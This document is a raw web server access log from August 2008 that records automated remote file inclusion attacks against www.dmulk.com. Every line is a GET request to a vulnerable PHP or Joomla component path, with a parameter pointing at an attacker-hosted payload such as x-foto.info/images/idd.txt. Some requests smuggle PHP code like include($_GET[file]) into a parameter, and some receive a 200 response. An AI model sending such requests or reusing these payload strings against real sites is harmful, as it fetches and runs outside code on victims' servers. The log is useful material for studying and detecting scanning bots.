64.13.225.31 - - [19/Aug/2008:10:30:58 -0700] "GET /logs/access_080620.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:30:58 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
91.84.19.133 - - [19/Aug/2008:10:31:05 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.58.154.237 - - [19/Aug/2008:10:31:05 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.73.189.205 - - [19/Aug/2008:10:31:12 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
69.73.189.205 - - [19/Aug/2008:10:31:13 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:10:31:34 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:31:35 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:31:36 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:31:36 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.64.112.75 - - [19/Aug/2008:10:31:44 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.64.112.75 - - [19/Aug/2008:10:31:44 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
151.11.24.250 - - [19/Aug/2008:10:31:51 -0700] "GET /logs/access_080312.log//faqsupport/samplefaqsupport.php?path[docroot]=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.66.188 - - [19/Aug/2008:10:31:53 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [19/Aug/2008:10:31:54 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [19/Aug/2008:10:32:10 -0700] "GET /logs//admin/frontpage_right.php?loadadminpage=http://albforum.freehostia.com/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [19/Aug/2008:10:32:11 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://albforum.freehostia.com/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
151.11.24.250 - - [19/Aug/2008:10:32:29 -0700] "GET /logs/access_080725.log//advancedguestbook/index.php?entry=http://c0d3d57.t35.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [19/Aug/2008:10:32:29 -0700] "GET //advancedguestbook/index.php?entry=http://c0d3d57.t35.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [19/Aug/2008:10:32:29 -0700] "GET /logs//advancedguestbook/index.php?entry=http://c0d3d57.t35.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [19/Aug/2008:10:32:59 -0700] "GET /logs/access_080724.log//advancedguestbook/index.php?entry=http://c0d3d57.t35.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:10:33:15 -0700] "GET /logs/access_080510.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:33:16 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 200 9932 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:10:33:16 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 200 9931 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:33:19 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 200 9932 "-" "libwww-perl/5.79" "www.dmulk.com"
81.26.215.28 - - [19/Aug/2008:10:33:19 -0700] "GET /logs/access_080510.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:33:19 -0700] "GET /logs/access_080510.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:33:20 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 200 9932 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
81.26.215.28 - - [19/Aug/2008:10:33:20 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 200 9932 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:33:27 -0700] "GET /logs/access_080510.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:33:28 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 200 9932 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:33:29 -0700] "GET /logs/access_080510.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:33:29 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 200 9932 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:33:29 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:33:34 -0700] "GET /logs/access_080510.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:33:35 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 200 9932 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:33:35 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:33:35 -0700] "GET /logs/access_080510.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:33:35 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 200 9932 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:33:35 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:10:33:37 -0700] "GET /logs/access_080510.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:10:33:38 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 200 9931 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:10:33:38 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
151.11.24.250 - - [19/Aug/2008:10:33:41 -0700] "GET /logs/access_080812.log//faqsupport/samplefaqsupport.php?path[docroot]=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.26.215.28 - - [19/Aug/2008:10:33:42 -0700] "GET /logs/access_080510.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.26.215.28 - - [19/Aug/2008:10:33:43 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 200 9932 "-" "libwww-perl/5.65" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:33:43 -0700] "GET /logs/access_080515.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
81.26.215.28 - - [19/Aug/2008:10:33:43 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.92.85.234 - - [19/Aug/2008:10:33:55 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://clubmusic.caucasus.net/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.92.85.234 - - [19/Aug/2008:10:33:56 -0700] "GET /logs/access_080724.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://clubmusic.caucasus.net/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.92.85.234 - - [19/Aug/2008:10:33:56 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://clubmusic.caucasus.net/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.92.85.234 - - [19/Aug/2008:10:33:56 -0700] "GET /logs/access_080530.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://clubmusic.caucasus.net/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.160.176.60 - - [19/Aug/2008:10:34:00 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:34:01 -0700] "GET /logs/access_080515.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:34:03 -0700] "GET /logs/access_080515.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.226.77.5 - - [19/Aug/2008:10:34:06 -0700] "GET /logs/access_080725.log//admin/frontpage_right.php?loadadminpage=http://albforum.freehostia.com/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [19/Aug/2008:10:34:08 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://albforum.freehostia.com/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [19/Aug/2008:10:34:08 -0700] "GET /logs//admin/frontpage_right.php?loadadminpage=http://albforum.freehostia.com/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:10:34:13 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 200 9931 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:10:34:17 -0700] "GET /logs/access_080404.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
151.11.24.250 - - [19/Aug/2008:10:34:30 -0700] "GET /logs/access_080725.log//advancedguestbook/index.php?entry=http://c0d3d57.t35.com/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [19/Aug/2008:10:34:30 -0700] "GET /logs//advancedguestbook/index.php?entry=http://c0d3d57.t35.com/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [19/Aug/2008:10:34:30 -0700] "GET //advancedguestbook/index.php?entry=http://c0d3d57.t35.com/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [19/Aug/2008:10:34:31 -0700] "GET /logs/access_080724.log//advancedguestbook/index.php?entry=http://c0d3d57.t35.com/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:34:39 -0700] "GET /logs/access_080404.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:34:42 -0700] "GET /logs/access_080404.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:34:43 -0700] "GET /logs/access_080404.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:10:35:03 -0700] "GET /logs/access_080404.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
203.149.62.160 - - [19/Aug/2008:10:35:20 -0700] "GET /logs/access_080812.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.149.62.160 - - [19/Aug/2008:10:35:20 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.149.62.160 - - [19/Aug/2008:10:35:52 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:10:35:54 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:10:35:55 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.149.62.160 - - [19/Aug/2008:10:35:57 -0700] "GET /logs/access_080805.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.226.77.5 - - [19/Aug/2008:10:36:05 -0700] "GET /logs/access_080717.log//admin/frontpage_right.php?loadadminpage=http://albforum.freehostia.com/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
203.149.62.160 - - [19/Aug/2008:10:36:59 -0700] "GET /logs/access_080805.log//modules/xfsection/modify.php?dir_module=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:37:03 -0700] "GET /logs/access_080804.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:37:03 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:37:03 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:37:06 -0700] "GET /logs/access_080804.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:37:06 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:37:06 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:10:37:14 -0700] "GET /logs/access_080804.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:10:37:14 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:10:37:14 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:10:37:19 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:10:37:19 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.69.246.191 - - [19/Aug/2008:10:37:19 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:37:31 -0700] "GET /logs/access_080804.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:37:31 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:37:31 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.66.188 - - [19/Aug/2008:10:37:41 -0700] "GET /logs/access_080804.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [19/Aug/2008:10:37:42 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [19/Aug/2008:10:37:42 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [19/Aug/2008:10:37:43 -0700] "GET /logs/access_080804.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [19/Aug/2008:10:37:43 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [19/Aug/2008:10:37:44 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:10:38:08 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:10:38:09 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 200 9931 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:10:38:24 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:10:38:25 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 200 9931 "-" "libwww-perl/5.812" "www.dmulk.com"
89.129.97.30 - - [19/Aug/2008:10:38:54 -0700] "GET /logs/access_080731.log//?path%5Bdocroot%5D=http://www.saren-first.com/images/n.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.129.97.30 - - [19/Aug/2008:10:38:56 -0700] "GET /logs/access_080219.log//?path%5Bdocroot%5D=http://www.saren-first.com/images/n.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.253.176 - - [19/Aug/2008:10:39:01 -0700] "GET /logs/errors.php?error=http://www.klubindia.com/adm/ide.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.253.176 - - [19/Aug/2008:10:39:01 -0700] "GET /errors.php?error=http://www.klubindia.com/adm/ide.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.176.11 - - [19/Aug/2008:10:39:06 -0700] "GET /logs/middle.php?page=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.11 - - [19/Aug/2008:10:39:06 -0700] "GET /logs/middle.php?page=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.11 - - [19/Aug/2008:10:39:07 -0700] "GET /middle.php?page=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.11 - - [19/Aug/2008:10:39:07 -0700] "GET /middle.php?page=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.150.189.10 - - [19/Aug/2008:10:39:07 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.150.189.10 - - [19/Aug/2008:10:39:07 -0700] "GET /logs/access_080812.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.150.189.10 - - [19/Aug/2008:10:39:07 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:39:15 -0700] "GET /logs/access_080412.log//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:39:15 -0700] "GET //administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
